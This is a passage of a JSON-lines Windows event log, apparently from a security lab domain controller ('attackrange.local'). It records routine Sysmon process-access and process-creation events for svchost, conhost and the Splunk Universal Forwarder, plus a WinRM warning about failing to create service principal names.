07:53:34.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2323,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2324,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2325,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2326,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2327,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F7E-5F25-0000-0010991F0400}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F7E-5F25-0000-0010991F0400}","TargetProcessId":"3808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2328,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.798\r\nSourceProcessGUID: {41C8662E-1F7E-5F25-0000-0010991F0400}\r\nSourceProcessId: 3808\r\nSourceThreadId: 3952\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.798","SourceProcessGUID":"{41C8662E-1F7E-5F25-0000-0010991F0400}","SourceProcessId":"3808","SourceThreadId":"3952","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":10154,"SourceName":"Microsoft-Windows-WinRM","ProviderGuid":"{A7975C8F-AC13-49F1-87DA-5A984A4AB417}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76830,"ProcessID":0,"ThreadID":0,"Channel":"System","Message":"The WinRM service failed to create the following SPNs: WSMAN/win-dc-6178966.attackrange.local; WSMAN/win-dc-6178966. \r\n\r\n Additional Data \r\n The error received was 1355: %%1355.\r\n\r\n User Action \r\n The SPNs can be created by an administrator using setspn.exe utility.","Opcode":"Info","spn1":"WSMAN/win-dc-6178966.attackrange.local","spn2":"WSMAN/win-dc-6178966","error":"1355","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2329,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.330\r\nProcessGuid: {41C8662E-1F7F-5F25-0000-001042210400}\r\nProcessId: 3424\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.330","ProcessGuid":"{41C8662E-1F7F-5F25-0000-001042210400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2330,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F7F-5F25-0000-001042210400}\r\nTargetProcessId: 3424\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F7F-5F25-0000-001042210400}","TargetProcessId":"3424","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program 